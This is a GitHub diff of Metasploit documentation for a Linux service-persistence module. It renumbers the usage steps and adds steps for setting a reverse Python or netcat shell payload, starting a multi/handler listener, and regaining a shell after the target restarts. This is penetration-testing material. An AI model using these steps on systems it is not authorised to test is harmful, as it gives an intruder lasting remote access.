File tree Expand file tree Collapse file tree 1 file changed +13
-7
lines changed
documentation/modules/exploit/linux/local Expand file tree Collapse file tree 1 file changed +13
-7
lines changed Original file line number Diff line number Diff line change 11
11
12
12
1 . Start msfconsole
13
13
2 . Exploit a box via whatever method
14
- 4 . Do: ` use exploit/linux/local/service_persistence `
15
- 5 . Do: ` set session # `
16
- 6 . Do: ` set verbose true `
17
- 7 . Do: ` set payload cmd/unix/reverse_python ` or ` payload cmd/unix/reverse_netcat ` depending on system.
18
- 8 . Optional Do: ` set SHELLAPTH /bin ` if needed for compatibility on remote system.
19
- 9 . Do: ` set lhost `
20
- 10 . Do: ` exploit `
14
+ 3 . Do: ` use exploit/linux/local/service_persistence `
15
+ 4 . Do: ` set session # `
16
+ 5 . Do: ` set verbose true `
17
+ 6 . Do: ` set payload cmd/unix/reverse_python ` or ` payload cmd/unix/reverse_netcat ` depending on system.
18
+ 7 . Optional Do: ` set SHELLAPTH /bin ` if needed for compatibility on remote system.
19
+ 8 . Do: ` set lhost `
20
+ 9 . Do: ` exploit `
21
+ 10 . Do: ` use exploit/multi/handler `
22
+ 11 . Do: ` set payload cmd/unix/reverse_python ` or ` payload cmd/unix/reverse_netcat ` depending on system.
23
+ 12 . Do: ` set lhost `
24
+ 13 . Do: ` exploit -j `
25
+ 14 . Kill your shell (if System V, reboot target). Upstart/systemd wait 10sec
26
+ 15 . Get Shell
21
27
22
28
## Options
23
29
You can’t perform that action at this time.
0 commit comments